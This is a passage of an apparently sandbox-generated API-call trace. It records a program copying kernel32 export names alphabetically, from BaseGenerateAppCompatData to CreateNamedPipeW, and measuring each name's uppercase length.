lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0081.460] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0081.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0081.460] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0081.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0081.460] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0081.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0081.460] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0081.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0081.460] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0081.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0081.460] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0081.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0081.461] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0081.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0081.461] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0081.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0081.461] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0081.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0081.461] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0081.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0081.461] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0081.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0081.461] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0081.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0081.461] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0081.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0081.461] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0081.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0081.461] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0081.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0081.461] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0081.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0081.461] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0081.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0081.461] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0081.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0081.461] lstrlenA (lpString="BEEP") returned 4 [0081.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0081.461] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0081.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0081.461] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0081.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0081.461] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0081.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0081.461] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0081.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0081.462] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0081.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0081.462] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0081.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0081.462] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0081.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0081.462] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0081.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0081.462] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0081.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0081.462] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0081.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0081.462] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0081.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0081.462] lstrlenA (lpString="CANCELIO") returned 8 [0081.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0081.462] lstrlenA (lpString="CANCELIOEX") returned 10 [0081.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0081.462] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0081.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0081.462] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0081.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0081.462] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0081.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0081.462] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0081.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0081.462] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0081.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0081.462] lstrlenA (lpString="CHECKELEVATION") returned 14 [0081.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0081.462] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0081.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0081.462] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0081.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0081.462] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0081.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0081.463] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0081.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0081.463] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0081.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0081.463] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0081.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0081.463] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0081.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0081.463] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0081.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0081.463] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0081.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0081.463] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0081.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0081.463] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0081.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0081.463] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0081.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0081.463] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0081.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0081.463] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0081.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0081.463] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0081.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0081.463] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0081.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0081.463] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0081.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0081.463] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0081.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0081.463] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0081.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0081.463] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0081.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0081.463] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0081.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0081.464] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0081.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0081.464] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0081.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0081.464] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0081.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0081.464] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0081.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0081.464] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0081.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0081.464] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0081.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0081.464] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0081.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0081.464] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0081.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0081.464] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0081.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0081.464] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0081.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0081.464] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0081.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0081.464] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0081.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0081.464] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0081.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0081.464] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0081.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0081.464] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0081.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0081.464] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0081.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0081.464] lstrlenA (lpString="COPYCONTEXT") returned 11 [0081.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0081.464] lstrlenA (lpString="COPYFILEA") returned 9 [0081.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0081.465] lstrlenA (lpString="COPYFILEEXA") returned 11 [0081.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0081.465] lstrlenA (lpString="COPYFILEEXW") returned 11 [0081.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0081.465] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0081.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0081.465] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0081.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0081.465] lstrlenA (lpString="COPYFILEW") returned 9 [0081.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0081.465] lstrlenA (lpString="COPYLZFILE") returned 10 [0081.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0081.465] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0081.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0081.465] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0081.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0081.465] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0081.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0081.465] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0081.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0081.465] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0081.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0081.465] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0081.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0081.465] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0081.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0081.465] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0081.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0081.465] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0081.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0081.465] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0081.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0081.465] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0081.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0081.465] lstrlenA (lpString="CREATEEVENTA") returned 12 [0081.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0081.466] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0081.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0081.466] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0081.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0081.466] lstrlenA (lpString="CREATEEVENTW") returned 12 [0081.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0081.466] lstrlenA (lpString="CREATEFIBER") returned 11 [0081.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0081.466] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0081.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0081.466] lstrlenA (lpString="CREATEFILEA") returned 11 [0081.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0081.466] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0081.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0081.466] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0081.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0081.466] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0081.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0081.466] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0081.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0081.466] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0081.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0081.466] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0081.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0081.466] lstrlenA (lpString="CREATEFILEW") returned 11 [0081.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0081.466] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0081.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0081.466] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0081.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0081.466] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0081.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0081.466] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0081.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0081.466] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0081.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0081.467] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0081.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0081.467] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0081.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0081.467] lstrlenA (lpString="CREATEJOBSET") returned 12 [0081.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0081.467] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0081.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0081.467] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0081.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0081.467] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0081.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0081.467] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0081.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0081.467] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0081.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0081.467] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0081.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0081.467] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0081.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0081.467] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0081.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0081.467] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0081.467] 